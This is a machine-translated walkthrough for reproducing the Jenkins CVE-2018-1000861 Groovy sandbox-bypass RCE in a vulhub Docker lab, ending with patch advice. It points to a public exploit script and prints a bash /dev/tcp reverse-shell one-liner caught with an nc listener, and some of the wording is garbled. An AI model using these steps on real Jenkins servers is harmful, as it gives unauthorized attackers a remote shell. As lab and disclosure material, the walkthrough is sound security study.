Shulou(Shulou.com)05/31 Report--

This article shares with you the content of a sample analysis of Jenkins remote command execution vulnerabilities. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Introduction to 0x00

Jenkins automated deployment can solve the repetitive tasks such as integration, testing and deployment, and the efficiency of tool integration is obviously higher than that of manual operation. And continuous integration can obtain the information of code changes earlier, thus enter the testing phase earlier and find problems earlier, so that the cost of solving problems will be significantly reduced: continuous integration shortens the time from development, integration, testing, and deployment, thus shortening the waiting time that appears in the middle; continuous integration also means that development, integration, testing, deployment can be sustained.

Overview of 0x01 vulnerabilities

Jenkins is developed using the Stapler framework, which allows users to call the public method once through URL PATH. Since there are no restrictions on this process, attackers can construct some special PATH to execute some sensitive Java methods. Through this loophole, you can find a lot of useful chains to exploit. The most serious one is that bypassing Groovy sandboxie causes unauthorized users to execute arbitrary commands: Jenkins will check the script for errors before executing Groovy in sandboxie. The check operation is without sandboxie. Attackers can execute arbitrary commands when checking this step through Meta-Programming.

0x02 scope of influence

2.153 and earlier

LTS 2.138.3 and earlier

0x03 environment building

1. The shooting range of this experiment is built with docker in vulhub. Vulhub download address:

Https://github.com/vulhub/vulhub

two。 Then install docker in the virtual machine, and install the docker-compose command. Please install Baidu by yourself.

3. After the download is completed, the virtual machine is installed, and then enter the relevant vulnerability directory

Cd vulhub-master/jenkins/CVE-2018-1000861 /

4. Use docker-compose up-d to run the vulnerability environment

5. After the environment starts, visit http://your-ip:8080 to see a Jenkins that has been successfully initialized

Recurrence of 0x04 vulnerabilities

1. Use the command to view the version of the target

Curl-s-I http://your-ip:8080|grep X-Jenkins

two。 Since this vulnerability is not echoed, the exp execution command is leaked on GitHub. Note: you can also use burp to grab the package.

Exp download address: https://github.com/orangetw/awesome-jenkins-rce-2019

Use python2 to check for vulnerabilities python2 exp.py http://your-ip:8080 "curl dnslog" when the download is complete

3. Since this vulnerability is not echoed, bounce shell / / Note: bounce shell requires base64 encryption

Bash-I > & / dev/tcp/your-ip/port 0 > & 1

Base64 encrypted URL: http://www.jackson-t.ca/runtime-exec-payloads.html

3.1Then listen on the ip and port of shell on nc, and send encrypted shell using exp

Summary

1. The reproduction of this vulnerability requires the use of docker environment and the ability to use docker basic commands.

two。 You need to use linux-related commands and the syntax for linux bounce shell

0x05 repair recommendation

1. Upgrade to the latest version or apply relevant patches

two。 Try not to open it to the public Internet.

3. Restrict IP access

Thank you for reading! This is the end of this article on "example analysis of Jenkins remote command execution vulnerabilities". I hope the above content can be helpful to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.